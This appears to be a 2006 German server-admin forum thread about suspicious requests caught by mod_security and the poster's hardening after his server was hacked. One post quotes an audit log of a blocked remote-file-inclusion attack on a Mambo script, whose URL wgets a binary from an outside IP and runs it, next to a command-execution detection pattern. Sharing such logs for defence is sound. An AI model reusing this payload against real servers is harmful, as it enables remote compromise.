Page 1 of 1
Merkwürdige Webseitenaufrufe
Posted: 2006-02-03 08:59
by danu
Im mod_security Logfile erscheinen oft Aufrufe wie:
GET / HTTP/1.1
User-Agent: Java1.3.1_07
normalerweise stehen ja bekannte Browser wie Netscape oder Mozilla oder was auch immer an gebräuchlichen Webbrowsern heute zur Verfügung.
Hat jemand eine Ahnung, mit welchen Methoden da irgendwer auf meinen
Wewbserver zugreifen will ? Gooogeln hat nichts gebracht.
Kennt jemand einen User Agent welcher Java1.3.1_07 heisst ???? 8O
Re: Merkwürdige Webseitenaufrufe
Posted: 2006-02-03 18:47
by Roger Wilco
danu wrote:Hat jemand eine Ahnung, mit welchen Methoden da irgendwer auf meinen
Wewbserver zugreifen will ?
Mit der Methode GET.
danu wrote:Kennt jemand einen User Agent welcher Java1.3.1_07 heisst ????
Lass mich überlegen, vielleicht die JVM 1.3.1 Patchlevel 7? Ist ein bisschen betagt, aber offensichtlich doch noch im Einsatz.
Re: Merkwürdige Webseitenaufrufe
Posted: 2006-02-05 14:48
by simcen
danu wrote:
Kennt jemand einen User Agent welcher Java1.3.1_07 heisst ???? 8O
Du kannst bei jedem selbst gebasteltem Browser oder Skript den User-Agent festlegen... Wenn ich mich nicht irre, geht das sogar beim FeuerFuchsen...
Aha
Posted: 2006-02-07 06:58
by danu
Thks an alle. Damit hat sich mein Verdacht bestätigt. Automatisierte
Queries und POST-Payloads. Die Scriptkiddies werden immer dreister. :?
Aaaaaatttaaaacke !!!
Posted: 2006-02-16 03:53
by danu
Gestern am 15.02. wurde mein Rootie bei S&P innerhalb 5 Minuten
im Sekundentakt ca. von 300 Requests mit unterschiedlichen Parametern heimgesucht. Beispiel aus dem modsec_audit.log:
(xxx.xxx.xxx.xxx --> IP meines Servers)
==84df6500==============================
Request: xxx.xxx.xxx.xxx 85.124.118.43 - - [15/Feb/2006:20:19:09 +0100]
"GET /index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=
http://209.123.16.34/cmd.gif?&cmd=cd%20
/tmp;wget%20209.123.16.34/giculo;chmod%20744%20giculo;./giculo;echo%20YYY;echo| HTTP/1.1" 403 999 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)" - "-"
Handler: type-map
----------------------------------------
GET /index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=
http://209.123.16.34/cmd.gif?&cmd=cd%20 ... 20YYY;echo| HTTP/1.1
Host: xxx.xxx.xxx.xxx
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)
mod_security-message: Access denied with code 403. Pattern match ";[[:space:]]*(ls|id|pwd|wget)" at ARGS_VALUES("cmd") [msg "Command execution attack"]
mod_security-action: 403
HTTP/1.1 403 Forbidden
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Transfer-Encoding: chunked
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
--84df6500--
Die Smilies im Log ergeben sich einfach aus der Kombination Strichpunkt & geschlossene Klammer und sind in diesem Kontext nicht beabsichtigt.
Das PHP-Script, welches dazu velinkt werden sollte, ist selbstredend:
http://209.123.16.34/cmd.gif
(ist wirklich ein PHP-Script und kann nur so wie im Log dargestellten Kontext Schaden anrichten)
Mit diesem Posting will ich nur "unseren" Rootie-Administratoren vor Augen führen, womit zu rechnen ist, und keinesfalls irgendwelche Hacker-Anleitungen propagieren :?
Ich hoffe, dass ich richtig verstanden werde.
Gruss, danu
Re: Aaaaaatttaaaacke !!!
Posted: 2006-02-16 04:48
by Joe User
Bekannter und behobener Bug im MSIE...
Re: Aaaaaatttaaaacke !!!
Posted: 2006-02-16 05:11
by danu
Joe User wrote:
Bekannter und behobener Bug im MSIE...
Damit ist das Problem ja nicht gelöst. Scriptkiddies verwenden wohl entsprechend modifizierte Browser.
simcen wrote:
Du kannst bei jedem selbst gebasteltem Browser oder Skript den User-Agent festlegen... Wenn ich mich nicht irre, geht das sogar beim FeuerFuchsen...
Es wäre ja ein leichtes, mit mod_security die Webseitenzugriffe auf
die "sichere" MSIE Version zu beschränken. Aber das kanns auch nicht sein.
Es ist so, als würde ich einem Einbrecher sagen "Du darfst nur mit einem offiziell registrierten und zugelassenen Schlüssel in meine Wohnung einbrechen, mit einem Dietrich oder selbst gebastelten Schlüssel ist das verboten.
danu
Re: Aaaaaatttaaaacke !!!
Posted: 2006-02-16 06:28
by Joe User
danu wrote:Joe User wrote:
Bekannter und behobener Bug im MSIE...
Damit ist das Problem ja nicht gelöst. Scriptkiddies verwenden wohl entsprechend modifizierte Browser.
Sorry, der MSIE-Bug ist hier nur sekundär relevant, primär sollte ein Bug in dem Script ausgenutzt werden, was aber durch mod_security erfolgreich verhindert wurde. Du solltest entweder das Script fixen, oder durch ein sichereres Script ersetzen...
Von Anfang an
Posted: 2006-02-16 07:58
by danu
Ja dank mod_security. Da musste ich erst darauf kommen. Am 23. Januar wurde mein Server gehackt :oops: Totalschaden, geshreddert. Sämtliche index.* irgendwas -Dateien waren defaced.
Bei mehr als 100 Domains von 56 Kunden mochte ich nicht lange suchen, welches Script da Schuld war. Ich musste den Server so schnell als möglich wieder Up haben. Also neu initieren, Backup drauf und nach ca 3 Stunden funktionierte ALLES wieder.
Seither habe ich alles mögliche für die Sicherheit unternommen:
1. Firewall aktiviert
Der Anbieter stellt einen externen Firewall zu Verfügung
2. Direktes root-Login ausgeschaltet.
3. SSHd Konsole Login nur noch für mich,
und das nur noch (chrooted) bin/bash.
4. Rootkit Hunter installiert.
Stellt in jedem Fall fest, wenn ein neuer User generiert wird,
oder in den Systemdateien etwas verändert wird.
(gut möglich, dass ich ein Rootkit darauf hatte, und
die ganze Zeit nichts bemerkt hatte)
5. IP_Blocker installiert
Die mehrmals täglich stattfindenden Brute Force Attacken mit jeweils
hunderten sshd-Loginversuchen werden damit unterbunden. Nach jeweils
3 Loginversuchen, wird die jeweilige IP für eine Zeit lang gesperrt. Ein paar Angreifer haben bereits aufgegeben.
6. Das Apachemodul mod_security installiert
Bin noch dabei die "Rules" zu optimieren.
Habe noch wegen der Scripte die neuen AGB's an die Kunden verschickt und habe bei diesen und jenen noch die Mambo CMS und phpBB (gebührenpflichtig) auf die neuesten Versionen updatet.
Mit andern Worten: Die letzten 20 Tage hatte ich einiges neu hinzu gelernt - auch dank diesem Forum.
An dieser Stelle nochmals ein Loblied auf mod_security:
Trotz alter Gästebuch-CGI's werden die Gästebücher nicht mehr mit Casinowerbung etc. vollgespamt. :D
Bei mehr als 100 Domains will (darf) ich ja nicht sämtliche Verzeichnisse nach gefährlichen Scripts absuchen. Deshalb benütze ich mod_security ja auch als zusätzlichen Schutz, weil ja "unsaubere" Requests und POST's gar nicht mehr beim Script ankommen sollen.
Gruss, danu